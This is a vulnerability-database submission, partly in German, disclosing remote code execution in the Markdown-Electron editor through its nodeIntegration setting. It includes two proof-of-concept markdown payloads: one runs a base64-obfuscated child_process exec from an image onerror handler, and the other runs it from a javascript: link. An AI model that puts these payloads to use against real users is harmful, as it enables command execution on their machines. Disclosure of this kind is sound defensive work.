Submit #92098: Incorrect electron configuration causes RCEinfo

Titel	Incorrect electron configuration causes RCE
Beschreibung	nodeIntegration: true decide Node APIs are enabled in renderer. And Markdown Editor does not filter dangerous operations. When we use this software to open the unknown markdwon file, it may cause Remote code execution (RCE). EXP # 0 click <img src=# onerror='eval(new Buffer(`amF2YXNjcmlwdDpyZXF1aXJlKCdjaGlsZF9wcm9jZXNzJykuZXhlYygnY2FsYycsIChlcnJvciwgc3Rkb3V0LCBzdGRlcnIpPT57YWxlcnQoJ1lvdSB3ZXJlIGhhY2tlZC4nKX0p`, `base64`).toString())'> # 1 click <a href="javascript:require('child_process').exec('calc', (error, stdout, stderr)=>{alert('You were hacked.')})">CLICK</a> For more details, please click the announcement.
Quelle	⚠️ https://github.com/JP1016/Markdown-Electron/issues/3
Benutzer	Tom23 (UID 41413)
Einreichung	20.02.2023 13:17 (vor 3 Jahren)
Moderieren	24.02.2023 09:00 (4 days later)
Status	Akzeptiert
VulDB Eintrag	221738 [JP1016 Markdown-Electron erweiterte Rechte]
Punkte	20

Do you want to use VulDB in your project?

Use the official API to access entries easily!